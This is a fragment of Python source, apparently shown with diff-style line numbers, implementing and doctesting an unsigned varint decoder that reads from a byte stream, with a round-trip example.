3991 4213 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3992 4214 0
3993 4215 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3994 4216 1
3995 4217 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3996 4218 127
3997 4219 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3998 4220 1337
3999 4221 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4000 4222 65536
4001 4223 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4002 4224 Traceback (most recent call last):
4003 4225 ...
4004 4226 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4005 4227 """
4006 4228 result = 0
4007 4229 shift = 0
4008 4230 while True:
4009 4231 byte = ord(readexactly(fh, 1))
4010 4232 result |= ((byte & 0x7f) << shift)
4011 4233 if not (byte & 0x80):
4012 4234 return result
4013 4235 shift += 7
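# The two varint helpers above are inverses; a quick round-trip sketch:
#
#   >>> from io import BytesIO
#   >>> all(uvarintdecodestream(BytesIO(uvarintencode(n))) == n
#   ...     for n in (0, 1, 127, 128, 1337, 2 ** 31))
#   True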